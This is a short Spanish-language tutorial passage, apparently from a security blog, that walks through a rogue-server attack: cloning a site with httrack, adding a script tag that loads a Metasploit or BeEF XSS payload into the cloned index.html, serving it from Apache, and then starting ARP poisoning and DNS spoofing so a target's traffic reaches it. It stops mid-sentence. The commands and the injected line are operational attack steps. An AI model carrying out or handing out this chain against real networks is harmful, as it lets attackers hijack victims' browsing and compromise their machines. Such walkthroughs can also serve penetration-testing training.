A continuación, se usará un ejemplo de la eficacia que puede demostrar un servidor rebelde. Para ello os mostraremos de una herramienta que permite clonar las páginas web que indiquemos, httrack.
Para usar httrack escribiremos el comando httrack http://ejemplo.com -N102 -O /Ruta/.

Como puede observarse tenemos la página web ya clonada, pero ahora debemos seguir con el siguiente paso. El cual será generar un payload para anexionarlo a la página que acabamos de clonar.

Tras generar el payload editaremos el fichero index.html, y le añadiremos la siguiente línea antes de </body>.
<script type="text/javascript"src=“./payload.js" > </script >
Pero al igual que lo hacemos con un payload de metasploit, podemos indexar también el código de Beef XSS.
A continuación debemos de copiar todo el contenido de la carpeta html y pegarlo en la ruta /var/www/html/ que es la carpeta que utiliza por defecto Apache. Solo queda levantar el servicio de Apache.

Tras eso comenzamos el envenenamiento ARP y el DNS Spoofing, abriremos Metasploit para esperar a que nuestro objetivo se conecte y ...
